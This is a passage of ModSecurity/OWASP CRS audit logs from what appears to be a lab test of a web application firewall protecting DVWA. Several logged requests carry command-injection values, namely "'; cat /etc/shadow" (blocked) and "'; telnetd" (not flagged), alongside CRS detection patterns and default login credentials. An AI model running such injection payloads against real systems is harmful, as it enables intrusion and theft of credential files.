\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZc38AAQEAAAmHBJAAAAAF\"]"],"stopwatch":{"p1":518,"p2":1131,"p3":58,"p4":149,"p5":54,"sr":58,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJEAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJEAAAAF\"]"],"stopwatch":{"p1":624,"p2":1164,"p3":47,"p4":276,"p5":50,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJIAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJIAAAAF\"]"],"stopwatch":{"p1":443,"p2":952,"p3":47,"p4":270,"p5":48,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:13 --0400","transaction_id":"WRczLX8AAQEAAAkW4RkAAAAB","remote_address":"192.168.75.145","remote_port":56752,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip:  cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip:  cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":3732,"p2":8676,"p3":0,"p4":0,"p5":403,"sr":67,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@QAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczOn8AAQEAAAkXs@QAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1011,"p2":2755,"p3":97,"p4":551,"p5":127,"sr":45,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@UAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczOn8AAQEAAAkXs@UAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":448,"p2":2424,"p3":111,"p4":911,"p5":90,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEcAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1906be74335ec24718b92c5fbc145c6d"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy 